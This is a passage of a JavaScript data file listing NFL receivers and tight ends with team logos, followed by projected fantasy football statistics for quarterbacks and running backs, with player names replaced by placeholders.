{id: 125, name : "<NAME>", position : "WR", team: "New England Patriots", logo : "https://upload.wikimedia.org/wikipedia/en/b/b9/New_England_Patriots_logo.svg", alt : "NE"},
{id: 126, name : "<NAME>", position : "WR", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 127, name : "<NAME>", position : "WR", team: "New York Jets", logo : "https://upload.wikimedia.org/wikipedia/en/6/6b/New_York_Jets_logo.svg", alt : "NYJ"},
{id: 128, name : "<NAME>", position : "WR", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 129, name : "<NAME>", position : "WR", team: "<NAME>", logo : "https://upload.wikimedia.org/wikipedia/en/4/44/Denver_Broncos_logo.svg", alt : "Den"},
{id: 130, name : "<NAME>", position : "WR", team: "New York Giants", logo : "https://upload.wikimedia.org/wikipedia/commons/6/60/New_York_Giants_logo.svg", alt : "NYG"},
{id: 131, name : "<NAME>", position : "WR", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 132, name : "<NAME>", position : "WR", team: "Dallas Cowboys", logo : "https://upload.wikimedia.org/wikipedia/commons/1/15/Dallas_Cowboys.svg", alt : "Dal"},
{id: 133, name : "<NAME>", position : "WR", team : "Carolina Panthers", logo : "https://upload.wikimedia.org/wikipedia/en/1/1c/Carolina_Panthers_logo.svg", alt : "Car"},
{id: 134, name : "<NAME>", position : "WR", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 135, name : "<NAME>", position : "WR", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
{id: 136, name : "<NAME>", position : "WR", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
{id: 137, name : "<NAME>", position : "WR", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 138, name : "<NAME>", position : "WR", team: "Oakland Raiders", logo : "https://upload.wikimedia.org/wikipedia/en/e/ec/Oakland_Raiders_logo.svg", alt : "Oak"},
{id: 139, name : "<NAME>", position : "WR", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 140, name : "<NAME>", position : "WR", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 141, name : "<NAME>", position : "WR", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 142, name : "<NAME>", position : "WR", team: "Tennessee Titans", logo : "https://upload.wikimedia.org/wikipedia/en/c/c1/Tennessee_Titans_logo.svg", alt : "Ten"},
{id: 143, name : "<NAME>", position : "TE", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 145, name : "<NAME>", position : "TE", team : "Carolina Panthers", logo : "https://upload.wikimedia.org/wikipedia/en/1/1c/Carolina_Panthers_logo.svg", alt : "Car"},
{id: 146, name : "<NAME>", position : "TE", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 147, name : "<NAME>", position : "TE", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 148, name : "<NAME>", position : "TE", team: "Tennessee Titans", logo : "https://upload.wikimedia.org/wikipedia/en/c/c1/Tennessee_Titans_logo.svg", alt : "Ten"},
{id: 149, name : "<NAME>", position : "TE", team: "Cincinnati Bengals", logo : "https://upload.wikimedia.org/wikipedia/commons/8/81/Cincinnati_Bengals_logo.svg", alt : "Cin"},
{id: 150, name : "<NAME>", position : "TE", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 151, name : "<NAME>", position : "TE", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 152, name : "<NAME>", position : "TE", team: "Minnesota Vikings", logo : "https://upload.wikimedia.org/wikipedia/en/4/48/Minnesota_Vikings_logo.svg", alt : "Min"},
{id: 153, name : "<NAME>", position : "TE", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 154, name : "<NAME>", position : "TE", team: "New York Giants", logo : "https://upload.wikimedia.org/wikipedia/commons/6/60/New_York_Giants_logo.svg", alt : "NYG"},
{id: 155, name : "<NAME>", position : "TE", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 156, name : "<NAME>", position : "TE", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 157, name : "<NAME>", position : "TE", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 158, name : "<NAME>", position : "TE", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 159, name : "<NAME>", position : "TE", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 160, name : "<NAME>", position : "TE", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 161, name : "<NAME>", position : "TE", team: "Atlanta Falcons", logo : "https://upload.wikimedia.org/wikipedia/en/c/c5/Atlanta_Falcons_logo.svg", alt : "Atl"},
{id: 162, name : "<NAME>", position : "TE", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 163, name : "<NAME>", position : "TE", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 164, name : "<NAME>", position : "TE", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
{id: 165, name : "<NAME>", position : "TE", team: "Oakland Raiders", logo : "https://upload.wikimedia.org/wikipedia/en/e/ec/Oakland_Raiders_logo.svg", alt : "Oak"}
];
const teams = [];
const stats = [
{
"Player": "<NAME>",
"Team": "KC",
"ATT": 580.7,
"CMP": 379.2,
"YDS": 4776.1,
"TDS": 35.9,
"INTS": 13.3,
"ATT_1": 52.5,
"YDS_1": 219.6,
"TDS_1": 1.9,
"FL": 2,
"FPTS": 337.5
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 509.5,
"CMP": 336.2,
"YDS": 4047.4,
"TDS": 26.2,
"INTS": 12,
"ATT_1": 95.3,
"YDS_1": 553.5,
"TDS_1": 4.3,
"FL": 2.7,
"FPTS": 318.7
},
{
"Player": "<NAME>",
"Team": "GB",
"ATT": 596.2,
"CMP": 378.4,
"YDS": 4315.3,
"TDS": 29.8,
"INTS": 7.6,
"ATT_1": 46.3,
"YDS_1": 260.5,
"TDS_1": 2.1,
"FL": 2.1,
"FPTS": 310.6
},
{
"Player": "<NAME>",
"Team": "IND",
"ATT": 605.4,
"CMP": 397.8,
"YDS": 4497.5,
"TDS": 33.4,
"INTS": 14.2,
"ATT_1": 51.8,
"YDS_1": 217.1,
"TDS_1": 1.4,
"FL": 2.6,
"FPTS": 310.1
},
{
"Player": "<NAME>",
"Team": "ATL",
"ATT": 585.5,
"CMP": 394.5,
"YDS": 4632.8,
"TDS": 30.1,
"INTS": 10.6,
"ATT_1": 48.2,
"YDS_1": 132.6,
"TDS_1": 1.5,
"FL": 2,
"FPTS": 302.6
},
{
"Player": "<NAME>",
"Team": "CAR",
"ATT": 515,
"CMP": 336.5,
"YDS": 3775.4,
"TDS": 24.6,
"INTS": 13.7,
"ATT_1": 113.2,
"YDS_1": 546.1,
"TDS_1": 4.4,
"FL": 1.7,
"FPTS": 300
},
{
"Player": "<NAME>",
"Team": "NO",
"ATT": 538.5,
"CMP": 387.2,
"YDS": 4338.2,
"TDS": 30.5,
"INTS": 8.8,
"ATT_1": 24.8,
"YDS_1": 40.2,
"TDS_1": 1.9,
"FL": 1.6,
"FPTS": 290.3
},
{
"Player": "<NAME>",
"Team": "TB",
"ATT": 560.7,
"CMP": 356.5,
"YDS": 4430.0,
"TDS": 27.4,
"INTS": 16.3,
"ATT_1": 57.2,
"YDS_1": 277.1,
"TDS_1": 1.6,
"FL": 2.7,
"FPTS": 286.3
},
{
"Player": "<NAME>",
"Team": "CLE",
"ATT": 564.7,
"CMP": 362.5,
"YDS": 4335.3,
"TDS": 30.8,
"INTS": 14.6,
"ATT_1": 47,
"YDS_1": 180.8,
"TDS_1": 0.9,
"FL": 2.4,
"FPTS": 285.8
},
{
"Player": "<NAME>",
"Team": "DAL",
"ATT": 522.1,
"CMP": 344.3,
"YDS": 3856.2,
"TDS": 23.7,
"INTS": 10.9,
"ATT_1": 68,
"YDS_1": 311.2,
"TDS_1": 5.3,
"FL": 2.3,
"FPTS": 285.6
},
{
"Player": "<NAME>",
"Team": "LAR",
"ATT": 551,
"CMP": 352.1,
"YDS": 4378.1,
"TDS": 30.2,
"INTS": 11.7,
"ATT_1": 31.1,
"YDS_1": 102.8,
"TDS_1": 1.2,
"FL": 2.2,
"FPTS": 285.5
},
{
"Player": "<NAME>",
"Team": "PHI",
"ATT": 568.4,
"CMP": 376.6,
"YDS": 4237.3,
"TDS": 30,
"INTS": 12.3,
"ATT_1": 52.3,
"YDS_1": 192,
"TDS_1": 1,
"FL": 2.6,
"FPTS": 284.8
},
{
"Player": "<NAME>",
"Team": "PIT",
"ATT": 619.1,
"CMP": 406,
"YDS": 4636.9,
"TDS": 29.4,
"INTS": 15.2,
"ATT_1": 23.3,
"YDS_1": 75.3,
"TDS_1": 1.2,
"FL": 1.8,
"FPTS": 284.1
},
{
"Player": "<NAME>",
"Team": "BAL",
"ATT": 431.9,
"CMP": 255.9,
"YDS": 2988.4,
"TDS": 16.9,
"INTS": 10.7,
"ATT_1": 172.5,
"YDS_1": 886.9,
"TDS_1": 6.1,
"FL": 4.9,
"FPTS": 281.3
},
{
"Player": "<NAME>",
"Team": "SEA",
"ATT": 453.2,
"CMP": 292.2,
"YDS": 3565.9,
"TDS": 27.8,
"INTS": 9.5,
"ATT_1": 73,
"YDS_1": 381.5,
"TDS_1": 2,
"FL": 2.1,
"FPTS": 281.1
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 580.3,
"CMP": 380,
"YDS": 4353.1,
"TDS": 29.2,
"INTS": 10.7,
"ATT_1": 20.8,
"YDS_1": 38.8,
"TDS_1": 1,
"FL": 1.5,
"FPTS": 276.4
},
{
"Player": "<NAME>",
"Team": "MIN",
"ATT": 578.4,
"CMP": 397.8,
"YDS": 4183.6,
"TDS": 27.9,
"INTS": 12.1,
"ATT_1": 38.5,
"YDS_1": 134.1,
"TDS_1": 1.9,
"FL": 2.4,
"FPTS": 274.4
},
{
"Player": "<NAME>",
"Team": "CHI",
"ATT": 511.3,
"CMP": 332.8,
"YDS": 3760.7,
"TDS": 25.1,
"INTS": 13,
"ATT_1": 65.9,
"YDS_1": 377.9,
"TDS_1": 2.4,
"FL": 2.5,
"FPTS": 272.1
},
{
"Player": "<NAME>",
"Team": "LAC",
"ATT": 546.3,
"CMP": 360.1,
"YDS": 4367.4,
"TDS": 29.6,
"INTS": 12.2,
"ATT_1": 13.5,
"YDS_1": 25.2,
"TDS_1": 0.2,
"FL": 1.4,
"FPTS": 269.8
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 537.4,
"CMP": 331.8,
"YDS": 3694.6,
"TDS": 21.6,
"INTS": 14.3,
"ATT_1": 107,
"YDS_1": 506.9,
"TDS_1": 3.2,
"FL": 3.2,
"FPTS": 268.9
},
{
"Player": "<NAME>",
"Team": "BUF",
"ATT": 479.7,
"CMP": 270.6,
"YDS": 3210.1,
"TDS": 17.3,
"INTS": 14.4,
"ATT_1": 104.8,
"YDS_1": 664.1,
"TDS_1": 6.3,
"FL": 2.9,
"FPTS": 267.1
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 519.2,
"CMP": 333.8,
"YDS": 4073.9,
"TDS": 25.1,
"INTS": 14.2,
"ATT_1": 37.7,
"YDS_1": 122.2,
"TDS_1": 1.3,
"FL": 2.1,
"FPTS": 250.8
},
{
"Player": "<NAME>",
"Team": "DET",
"ATT": 560,
"CMP": 368.8,
"YDS": 3971.3,
"TDS": 24.2,
"INTS": 11.6,
"ATT_1": 28.9,
"YDS_1": 78.5,
"TDS_1": 0.7,
"FL": 1.7,
"FPTS": 241.4
},
{
"Player": "<NAME>",
"Team": "OAK",
"ATT": 570.3,
"CMP": 379.4,
"YDS": 4098.3,
"TDS": 23.6,
"INTS": 12.2,
"ATT_1": 24.5,
"YDS_1": 68.7,
"TDS_1": 0.6,
"FL": 2.1,
"FPTS": 240.6
},
{
"Player": "<NAME>",
"Team": "CIN",
"ATT": 533.6,
"CMP": 331.2,
"YDS": 3684.9,
"TDS": 24,
"INTS": 13.6,
"ATT_1": 32.9,
"YDS_1": 119.9,
"TDS_1": 0.9,
"FL": 1.7,
"FPTS": 229.9
},
{
"Player": "<NAME>",
"Team": "NYJ",
"ATT": 530.7,
"CMP": 320,
"YDS": 3645.3,
"TDS": 22.6,
"INTS": 15.8,
"ATT_1": 48,
"YDS_1": 187.5,
"TDS_1": 1.6,
"FL": 2.3,
"FPTS": 228
},
{
"Player": "<NAME>",
"Team": "TEN",
"ATT": 446.9,
"CMP": 294,
"YDS": 3269.0,
"TDS": 18.3,
"INTS": 12.6,
"ATT_1": 70.4,
"YDS_1": 358.9,
"TDS_1": 2.6,
"FL": 2.4,
"FPTS": 225.6
},
{
"Player": "<NAME>",
"Team": "JAC",
"ATT": 531.8,
"CMP": 338.8,
"YDS": 3777.9,
"TDS": 21.5,
"INTS": 13.3,
"ATT_1": 33.1,
"YDS_1": 76.5,
"TDS_1": 0.9,
"FL": 2,
"FPTS": 219.9
},
{
"Player": "<NAME>",
"Team": "NYG",
"ATT": 497.4,
"CMP": 314.4,
"YDS": 3382.5,
"TDS": 19,
"INTS": 10.7,
"ATT_1": 20.7,
"YDS_1": 50.3,
"TDS_1": 1,
"FL": 2.5,
"FPTS": 196
},
{
"Player": "<NAME>",
"Team": "NYG",
"ATT": 87.3,
"CMP": 54,
"YDS": 730.1,
"TDS": 3.9,
"INTS": 3.1,
"ATT_1": 5.8,
"YDS_1": 33.7,
"TDS_1": 0.3,
"FL": 0.4,
"FPTS": 42.9
},
{
"Player": "<NAME>",
"Team": "NYG",
"ATT": 269,
"YDS": 1253.7,
"TDS": 9.6,
"REC": 87.6,
"YDS_1": 705.5,
"TDS_1": 3.4,
"FL": 1.5,
"FPTS": 358.6
},
{
"Player": "<NAME>",
"Team": "CAR",
"ATT": 215.8,
"YDS": 1044.8,
"TDS": 6.7,
"REC": 97.2,
"YDS_1": 824.3,
"TDS_1": 5.1,
"FL": 1.8,
"FPTS": 351.6
},
{
"Player": "<NAME>",
"Team": "NO",
"ATT": 194.7,
"YDS": 913.8,
"TDS": 9.6,
"REC": 87.4,
"YDS_1": 771.3,
"TDS_1": 4.6,
"FL": 1.5,
"FPTS": 338.3
},
{
"Player": "<NAME>",
"Team": "DAL",
"ATT": 294.3,
"YDS": 1295.2,
"TDS": 8.9,
"REC": 67,
"YDS_1": 515.7,
"TDS_1": 2.6,
"FL": 2.2,
"FPTS": 312.5
},
{
"Player": "<NAME>",
"Team": "NYJ",
"ATT": 257.1,
"YDS": 1106.4,
"TDS": 7.6,
"REC": 64,
"YDS_1": 514.9,
"TDS_1": 2.6,
"FL": 1.8,
"FPTS": 284.1
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 247,
"YDS": 1000.4,
"TDS": 7.4,
"REC": 59.3,
"YDS_1": 565.3,
"TDS_1": 3.1,
"FL": 2.4,
"FPTS": 274.3
},
{
"Player": "<NAME>",
"Team": "MIN",
"ATT": 245.8,
"YDS": 1113.0,
"TDS": 6.6,
"REC": 59.5,
"YDS_1": 455.8,
"TDS_1": 2.2,
"FL": 2.9,
"FPTS": 263.5
},
{
"Player": "<NAME>",
"Team": "PIT",
"ATT": 228.1,
"YDS": 1016.9,
"TDS": 9.5,
"REC": 53.5,
"YDS_1": 435.2,
"TDS_1": 1.6,
"FL": 1.7,
"FPTS": 261.6
},
{
"Player": "<NAME>",
"Team": "LAR",
"ATT": 218.4,
"YDS": 1009.4,
"TDS": 9.9,
"REC": 46.3,
"YDS_1": 423.9,
"TDS_1": 2.6,
"FL": 1.5,
"FPTS": 261.4
},
{
"Player": "<NAME>",
"Team": "CIN",
"ATT": 245.7,
"YDS": 1144.0,
"TDS": 8.4,
"REC": 47.1,
"YDS_1": 354.8,
"TDS_1": 1.2,
"FL": 1.5,
"FPTS": 251.5
},
{
"Player": "<NAME>",
"Team": "CLE",
"ATT": 243.8,
"YDS": 1165.0,
"TDS": 9.2,
"REC": 32.7,
"YDS_1": 251.6,
"TDS_1": 1.6,
"FL": 1,
"FPTS": 236.8
},
{
"Player": "<NAME>",
"Team": "DET",
"ATT": 212.4,
"YDS": 997.4,
"TDS": 6.5,
"REC": 49.5,
"YDS_1": 354.9,
"TDS_1": 1.9,
"FL": 1.7,
"FPTS": 231.4
},
{
"Player": "<NAME>",
"Team": "JAC",
"ATT": 249.5,
"YDS": 968.1,
"TDS": 7.5,
"REC": 43.6,
"YDS_1": 362,
"TDS_1": 1.5,
"FL": 1.2,
"FPTS": 228
},
{
"Player": "<NAME>",
"Team": "LAC",
"ATT": 179.9,
"YDS": 812.7,
"TDS": 7.5,
"REC": 42.8,
"YDS_1": 390.3,
"TDS_1": 2.5,
"FL": 1.2,
"FPTS": 221.1
},
{
"Player": "<NAME>",
"Team": "GB",
"ATT": 195.4,
"YDS": 969.1,
"TDS": 8.5,
"REC": 37.3,
"YDS_1": 287.5,
"TDS_1": 1.4,
"FL": 1.4,
"FPTS": 219.4
},
{
"Player": "<NAME>",
"Team": "OAK",
"ATT": 214,
"YDS": 938.7,
"TDS": 6.5,
"REC": 42.3,
"YDS_1": 353,
"TDS_1": 1.6,
"FL": 1.6,
"FPTS": 217.1
},
{
"Player": "<NAME>",
"Team": "TEN",
"ATT": 268.6,
"YDS": 1240.6,
"TDS": 10.4,
"REC": 17,
"YDS_1": 129.1,
"TDS_1": 0.3,
"FL": 1.3,
"FPTS": 215.8
},
{
"Player": "<NAME>",
"Team": "KC",
"ATT": 151,
"YDS": 728.8,
"TDS": 6.9,
"REC": 46.5,
"YDS_1": 368.8,
"TDS_1": 3.4,
"FL": 1.4,
"FPTS": 215.6
},
{
"Player": "<NAME>",
"Team": "SEA",
"ATT": 239.6,
"YDS": 1113.4,
"TDS": 8.2,
"REC": 27.3,
"YDS_1": 220.8,
"TDS_1": 1,
"FL": 1.9,
"FPTS": 212
},
{
"Player": "<NAME>",
"Team": "ATL",
"ATT": 202.9,
"YDS": 874,
"TDS": 6.9,
"REC": 41.5,
"YDS_1": 331.5,
"TDS_1": 1.8,
"FL": 1.3,
"FPTS": 211.7
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 67.2,
"YDS": 285.7,
"TDS": 2.5,
"REC": 71.1,
"YDS_1": 629.6,
"TDS_1": 4.1,
"FL": 0.5,
"FPTS": 201.2
},
{
"Player": "<NAME>",
"Team": "IND",
"ATT": 234.6,
"YDS": 1061.9,
"TDS": 7.9,
"REC": 26,
"YDS_1": 187.4,
"TDS_1": 0.9,
"FL": 1.5,
"FPTS": 201
},
{
"Player": "<NAME>",
"Team": "CHI",
"ATT": 204.1,
"YDS": 888.1,
"TDS": 6.4,
"REC": 33.7,
"YDS_1": 275.6,
"TDS_1": 1.4,
"FL": 1.9,
"FPTS": 193.1
},
{
"Player": "<NAME>",
"Team": "BAL",
"ATT": 221.5,
"YDS": 940.3,
"TDS": 6.7,
"REC": 32.5,
"YDS_1": 247.6,
"TDS_1": 0.8,
"FL": 1.7,
"FPTS": 193
},
{
"Player": "<NAME>",
"Team": "DEN",
"ATT": 185.7,
"YDS": 899,
"TDS": 6.4,
"REC": 34.5,
"YDS_1": 249.3,
"TDS_1": 1,
"FL": 1,
"FPTS": 191.8
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 236.7,
"YDS": 1076.9,
"TDS": 9.2,
"REC": 11.3,
"YDS_1": 85.9,
"TDS_1": 0.3,
"FL": 1.5,
"FPTS": 181.6
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 143,
"YDS": 609.6,
"TDS": 3.8,
"REC": 46.8,
"YDS_1": 393.1,
"TDS_1": 2.3,
"FL": 1.4,
"FPTS": 181.1
},
{
"Player": "<NAME>",
"Team": "CHI",
"ATT": 84.1,
"YDS": 352.2,
"TDS": 2.2,
"REC": 59,
"YDS_1": 550.8,
"TDS_1": 3.1,
"FL": 1.7,
"FPTS": 177.8
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 122.3,
"YDS": 575,
"TDS": 3.2,
"REC": 45.9,
"YDS_1": 410.9,
"TDS_1": 2.2,
"FL": 0.7,
"FPTS": 175.1
},
{
"Player": "<NAME>",
"Team": "WAS",
"ATT": 178.5,
"YDS": 800.3,
"TDS": 5.6,
"REC": 29.6,
"YDS_1": 249.8,
"TDS_1": 0.9,
"FL": 1.6,
"FPTS": 170.3
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 168.1,
"YDS": 777,
"TDS": 4.8,
"REC": 29,
"YDS_1": 262.1,
"TDS_1": 1.5,
"FL": 0.8,
"FPTS": 168.7
},
{
"Player": "<NAME>",
"Team": "LAC",
"ATT": 122.3,
"YDS": 564.1,
"TDS": 3.4,
"REC": 40.5,
"YDS_1": 378.5,
"TDS_1": 2.1,
"FL": 1,
"FPTS": 165.9
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 152.2,
"YDS": 666.4,
"TDS": 4,
"REC": 31.9,
"YDS_1": 288.9,
"TDS_1": 1.6,
"FL": 1,
"FPTS": 158.7
},
{
"Player": "<NAME>",
"Team": "PHI",
"ATT": 157.8,
"YDS": 620.6,
"TDS": 4.4,
"REC": 32.7,
"YDS_1": 260.7,
"TDS_1": 1.3,
"FL": 1.4,
"FPTS": 152.6
},
{
"Player": "<NAME>",
"Team": "TB",
"ATT": 180.7,
"YDS": 741,
"TDS": 4.7,
"REC": 22.1,
"YDS_1": 148.1,
"TDS_1": 0.6,
"FL": 1.4,
"FPTS": 139.6
},
{
"Player": "<NAME>",
"Team": "NO",
"ATT": 164,
"YDS": 648,
"TDS": 6.4,
"REC": 17.1,
"YDS_1": 112.8,
"TDS_1": 0.4,
"FL": 0.8,
"FPTS": 132.2
},
{
"Player": "<NAME>",
"Team": "SEA",
"ATT": 150.9,
"YDS": 683.9,
"TDS": 4,
"REC": 18.6,
"YDS_1": 143.4,
"TDS_1": 0.8,
"FL": 1,
"FPTS": 127.8
},
{
"Player": "<NAME>",
"Team": "WAS",
"ATT": 56.1,
"YDS": 232.9,
"TDS": 0.9,
"REC": 49.8,
"YDS_1": 384.6,
"TDS_1": 1.9,
"FL": 0.8,
"FPTS": 126.3
},
{
"Player": "<NAME>",
"Team": "KC",
"ATT": 124.9,
"YDS": 484.9,
"TDS": 4,
"REC": 27.9,
"YDS_1": 212.1,
"TDS_1": 1.1,
"FL": 1.1,
"FPTS": 125.7
},
{
"Player": "<NAME>",
"Team": "BUF",
"ATT": 157.8,
"YDS": 570.3,
"TDS": 3.4,
"REC": 24,
"YDS_1": 205.5,
"TDS_1": 0.8,
"FL": 1,
"FPTS": 125
},
{
"Player": "<NAME>",
"Team": "MIA",
"ATT": 127.4,
"YDS": 628.6,
"TDS": 3.8,
"REC": 23.7,
"YDS_1": 175.1,
"TDS_1": 0.4,
"FL": 2.4,
"FPTS": 124.5
},
{
"Player": "<NAME>",
"Team": "TEN",
"ATT": 94.4,
"YDS": 367.6,
"TDS": 2,
"REC": 41.4,
"YDS_1": 297.2,
"TDS_1": 1,
"FL": 0.7,
"FPTS": 124.4
},
{
"Player": "<NAME>",
"Team": "LAR",
"ATT": 117.1,
"YDS": 525.4,
"TDS": 3.6,
"REC": 24.2,
"YDS_1": 207.3,
"TDS_1": 1,
"FL": 1.3,
"FPTS": 122.1
},
{
"Player": "<NAME>",
"Team": "OAK",
"ATT": 48.4,
"YDS": 227.3,
"TDS": 1.3,
"REC": 47,
"YDS_1": 402.9,
"TDS_1": 1.2,
"FL": 1.6,
"FPTS": 121.8
},
{
"Player": "<NAME>",
"Team": "PHI",
"ATT": 152.6,
"YDS": 652,
"TDS": 5,
"REC": 15.8,
"YDS_1": 106.6,
"TDS_1": 0.3,
"FL": 1.1,
"FPTS": 121.5
},
{
"Player": "<NAME>",
"Team": "IND",
"ATT": 73.6,
"YDS": 295.3,
"TDS": 1.5,
"REC": 39.4,
"YDS_1": 294.9,
"TDS_1": 1.3,
"FL": 0.7,
"FPTS": 113.5
},
{
"Player": "<NAME>",
"Team": "PIT",
"ATT": 74.8,
"YDS": 313.2,
"TDS": 2,
"REC": 32.2,
"YDS_1": 259.9,
"TDS_1": 2,
"FL": 0.7,
"FPTS": 112
},
{
"Player": "<NAME>",
"Team": "OAK",
"ATT": 135,
"YDS": 570,
"TDS": 4.7,
"REC": 16.8,
"YDS_1": 115,
"TDS_1": 0.2,
"FL": 1.5,
"FPTS": 111.5
},
{
"Player": "<NAME>",
"Team": "DEN",
"ATT": 160.3,
"YDS": 594.4,
"TDS": 3.9,
"REC": 15.1,
"YDS_1": 101.7,
"TDS_1": 0.3,
"FL": 1,
"FPTS": 108.1
},
{
"Player": "<NAME>",
"Team": "BUF",
"ATT": 120,
"YDS": 585.9,
"TDS": 3.2,
"REC": 14.4,
"YDS_1": 122.7,
"TDS_1": 0.5,
"FL": 0.8,
"FPTS": 105.6
},
{
"Player": "<NAME>",
"Team": "CIN",
"ATT": 75.3,
"YDS": 288.6,
"TDS": 1.9,
"REC": 33.9,
"YDS_1": 259.2,
"TDS_1": 0.7,
"FL": 0.4,
"FPTS": 103.4
},
{
"Player": "<NAME>",
"Team": "ATL",
"ATT": 100.6,
"YDS": 408.4,
"TDS": 3.3,
"REC": 23.4,
"YDS_1": 160.2,
"TDS_1": 0.7,
"FL": 0.8,
"FPTS": 102.7
},
{
"Player": "<NAME>",
"Team": "GB",
"ATT": 106.9,
"YDS": 414.9,
"TDS": 2.7,
"REC": 22.6,
"YDS_1": 177.1,
"TDS_1": 0.6,
"FL": 0.6,
"FPTS": 100.6
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 112.5,
"YDS": 484.5,
"TDS": 2.9,
"REC": 18.5,
"YDS_1": 136,
"TDS_1": 0.6,
"FL": 2.6,
"FPTS": 96
},
{
"Player": "<NAME>",
"Team": "TB",
"ATT": 122.2,
"YDS": 435.7,
"TDS": 3.3,
"REC": 17.9,
"YDS_1": 125.6,
"TDS_1": 0.4,
"FL": 0.8,
"FPTS": 95
},
{
"Player": "<NAME>",
"Team": "CLE",
"ATT": 83.9,
"YDS": 356,
"TDS": 2.9,
"REC": 18.5,
"YDS_1": 172.7,
"TDS_1": 1.1,
"FL": 0.5,
"FPTS": 94.2
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 131.3,
"YDS": 441.9,
"TDS": 3.2,
"REC": 13.3,
"YDS_1": 85.9,
"TDS_1": 0.2,
"FL": 1,
"FPTS": 84.1
},
{
"Player": "<NAME>",
"Team": "BUF",
"ATT": 60,
"YDS": 239,
"TDS": 1.2,
"REC": 25.3,
"YDS_1": 222.5,
"TDS_1": 1.1,
"FL": 0.6,
"FPTS": 83.6
},
{
"Player": "<NAME>",
"Team": "WAS",
"ATT": 110.5,
"YDS": 427.4,
"TDS": 2.9,
"REC": 12.3,
"YDS_1": 95.8,
"TDS_1": 0.3,
"FL": 0.9,
"FPTS": 81.9
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 99.6,
"YDS": 367.6,
"TDS": 3,
"REC": 13.7,
"YDS_1": 116.9,
"TDS_1": 0.5,
"FL": 1,
"FPTS": 81.5
},
{
"Player": "<NAME>",
"Team": "BAL",
"ATT": 78.8,
"YDS": 322.1,
"TDS": 2.3,
"REC": 17.5,
"YDS_1": 134.8,
"TDS_1": 0.6,
"FL": 0.9,
"FPTS": 79.2
},
{
"Player": "<NAME>",
"Team": "LAC",
"ATT": 84,
"YDS": 332.5,
"TDS": 2.2,
"REC": 15.5,
"YDS_1": 124.6,
"TDS_1": 0.4,
"FL": 0.2,
"FPTS": 76.4
},
{
"Player": "<NAME>",
"Team": "NYJ",
"ATT": 70.3,
"YDS": 244.8,
"TDS": 1.8,
"REC": 19.8,
"YDS_1": 159.2,
"TDS_1": 0.7,
"FL": 0.8,
"FPTS": 73.5
},
{
"Player": "<NAME>",
